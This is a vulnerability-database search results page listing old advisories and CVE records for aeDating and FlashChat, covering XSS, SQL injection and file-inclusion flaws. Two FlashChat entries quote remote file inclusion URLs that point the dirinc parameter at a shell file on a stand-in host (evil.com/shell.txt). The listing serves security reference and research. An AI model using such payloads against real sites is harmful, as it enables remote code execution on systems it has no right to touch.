Lucene search
K

37 matches found

exploitpack
exploitpack
added 2006/09/04 12:0 a.m.87 views

FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion

FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...

7.5AI score
Exploits0
Exploit DB
Exploit DB
added 2006/09/04 12:0 a.m.244 views

FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion

NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt? http://site.com/scriptpath/inc/cmses/aedatingCMS2.php?dirinc=http://evil.com/shell.txt?...

7.4AI score
Exploits0
NVD
NVD
added 2006/06/28 10:5 p.m.15 views

CVE-2006-3279

Cross-site scripting XSS vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the 1 Sex parameter in index.php, 2 ProfileType parameter in joinform.php, and 3 Email parameter in forgot.php...

4.3CVSS5.7AI score0.01317EPSS
Exploits0References7
Cvelist
Cvelist
added 2006/06/28 10:0 p.m.20 views

CVE-2006-3279

Cross-site scripting XSS vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the 1 Sex parameter in index.php, 2 ProfileType parameter in joinform.php, and 3 Email parameter in forgot.php...

5.7AI score0.01317EPSS
Exploits0References7
CVE
CVE
added 2006/06/28 10:0 p.m.56 views

CVE-2006-3279

CVE-2006-3279 describes a cross-site scripting (XSS) vulnerability in aeDating 4.1. The affected application exposes three vulnerable input points: the Sex parameter in index.php, the ProfileType parameter in join_form.php, and the Email parameter in forgot.php. These allow remote attackers to in...

4.3CVSS6AI score0.01317EPSS
Exploits0References7Affected Software1
NVD
NVD
added 2005/09/20 12:3 a.m.17 views

CVE-2005-2985

SQL injection vulnerability in searchresult.php in AEwebworks aeDating Script 4.0 and earlier allows remote attackers to execute arbitrary SQL statements via the Country parameter...

7.5CVSS8.2AI score0.01162EPSS
Exploits1References4
CVE
CVE
added 2005/09/19 4:0 a.m.48 views

CVE-2005-2985

The CVE refers to a SQL injection vulnerability in AEwebworks aeDating Script 4.0 and earlier, exploitable via the Country parameter in search_result.php. The root cause is unsanitized user input leading to arbitrary SQL execution; affected product versions are aeDating Script 4.0 and earlier. Im...

7.5CVSS8.6AI score0.01162EPSS
Exploits1References4Affected Software1
Exploit DB
Exploit DB
added 2005/09/15 12:0 a.m.24 views

AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection

source: https://www.securityfocus.com/bid/14847/info AEwebworks aeDating is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before it is used in an SQL query. Successful exploitation could result in a compromise of the application,...

7.4AI score
Exploits0
NVD
NVD
added 2005/05/02 4:0 a.m.8 views

CVE-2005-1085

Cross-site scripting XSS vulnerability in the control panel in aeDating 3.2 allows remote attackers to inject arbitrary web script or HTML...

4.3CVSS5.8AI score0.00948EPSS
Exploits0References1
NVD
NVD
added 2005/05/02 4:0 a.m.16 views

CVE-2005-1083

index.php in aeDating 3.2 allows remote attackers to include arbitrary files via the skin parameter...

5CVSS6.8AI score0.01053EPSS
Exploits0References1
NVD
NVD
added 2005/05/02 4:0 a.m.14 views

CVE-2005-1084

SQL injection vulnerability in sdating.php in aeDating 3.2 allows remote attackers to execute arbitrary SQL commands files via the event parameter...

7.5CVSS8.4AI score0.01124EPSS
Exploits0References1
Cvelist
Cvelist
added 2005/04/12 4:0 a.m.10 views

CVE-2005-1085

Cross-site scripting XSS vulnerability in the control panel in aeDating 3.2 allows remote attackers to inject arbitrary web script or HTML...

5.8AI score0.00948EPSS
Exploits0References1
Cvelist
Cvelist
added 2005/04/12 4:0 a.m.15 views

CVE-2005-1083

index.php in aeDating 3.2 allows remote attackers to include arbitrary files via the skin parameter...

6.8AI score0.01053EPSS
Exploits0References1
CVE
CVE
added 2005/04/12 4:0 a.m.37 views

CVE-2005-1085

CVE-2005-1085 : The vulnerability is a cross-site scripting (XSS) issue in the aeDating 3.2 control panel that allows remote attackers to inject arbitrary web script or HTML. Connected sources (NVD, Red Hat, CVE listings) reiterate the same description without providing technical details such as ...

4.3CVSS6.1AI score0.00948EPSS
Exploits0References1
CVE
CVE
added 2005/04/12 4:0 a.m.51 views

CVE-2005-1083

CVE-2005-1083 concerns index.php in aeDating 3.2, where an attacker can remotely include arbitrary files via the skin parameter. This is a plain file inclusion vulnerability and results in arbitrary file inclusion. Context from multiple sources (NVD/Red Hat/CVE records) confirms the affected prod...

5CVSS7.2AI score0.01053EPSS
Exploits0References1Affected Software1
CVE
CVE
added 2005/04/12 4:0 a.m.42 views

CVE-2005-1084

The CVE describes an SQL injection in aeDating 3.2 involving sdating.php where the event parameter can be exploited by remote attackers to execute arbitrary SQL commands. Affected component: sdating.php within aeDating 3.2. Root cause: improper handling/sanitization of the event parameter leading...

7.5CVSS8.8AI score0.01124EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2005/04/12 4:0 a.m.16 views

CVE-2005-1084

SQL injection vulnerability in sdating.php in aeDating 3.2 allows remote attackers to execute arbitrary SQL commands files via the event parameter...

8.4AI score0.01124EPSS
Exploits0References1
Rows per page
Query Builder